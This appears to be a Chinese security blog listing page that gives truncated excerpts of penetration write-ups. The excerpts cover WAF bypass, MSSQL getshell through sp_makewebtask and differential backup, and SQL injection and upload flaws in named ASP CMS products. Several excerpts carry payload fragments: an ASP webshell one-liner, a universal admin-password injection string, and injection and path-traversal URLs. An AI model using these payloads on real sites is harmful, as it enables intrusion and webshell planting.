前些天临时写的一脚本级反向代理程序,用法很简单,设置好目标站地址,然后放到你网站根目录:index.asp,再将404页面自定义为:index.asp,即可。 由于暂时没有 url 替换需要,所以没有...
那些可以绕过WAF的各种特性
来自公众号:Bypass我们一般将安全防护软件划分为:云WAF、硬件waf、主机防护软件、软件waf等。在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF层等,以便我们更灵活地去构...
从某公司文件上传到内网漫游
今天拿到一个某公司文件上传点,就尝试一波getshell,最后成功进入内网,这里记录一下思路和操作。对于大佬来说应该都很基础,但是对于我这个划水混子来说还是学到了一些东西。这个站我拿到的时候就直接是一...
MSSQL把查询的东西写到文件中
当做另一种写shell的方式,或者导出数据的方法吧。exec sp_makewebtask 'c:wwwtestwri.asp','select''<%execute(request("SB")...
Web渗透之mssql2005 差异备份getshell
这里记录下mssql2005差异备份拿shell的过程 http://192.168.5.21:81/index.asp?id=1;alter/**/database/**/[asp_tes...
樱桃企业网站管理系统V3.1漏洞
漏洞文件:news_category.asp Set rs = server.CreateObject("adodb.recordset") sql ="select * from...
万众电子期刊在线阅读系统ASP版本getshell
最近在看一套信息分类系统。看了好久毫无头绪,结果意外的发现了他们使用了万众电子期刊ASP版本。于是找来源码看了下。意外的发现了sql注入以及集合IIS6的getshell 1.sq...
Fyblogs网站管理系统漏洞
后台万能密码 'or'='or' 后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露! admin/uploadfile.asp?currentFolder=/upfiles/....
siteserver cms 3.4.5鸡肋上传漏洞
发布时间:2012-5.01 发布作者:姗姗来迟漏洞类型:文件上传漏洞描述: 此漏洞跟原来的漏洞 手法非常相似!
FoosunCms的asp版本getshell
在文件/User/award/awardAction.asp中: [php] Integral=NoSqlHack(request.QueryString("Integral"))
无忧网络文章管理系统(5UCMS)注入漏洞
后台地址:admin/Login.asp数据库路径:inc/db 目录下漏洞地址:admin/ajax.asp?Act=modeext&cid=1%20and%201=2...
QVODCMS V4.0 相关漏洞利用
先是上传: 位于admin/Fckeditor/maxcms_upload.htmmaxcms_upload.htm :form name="form" id="form" enc...
27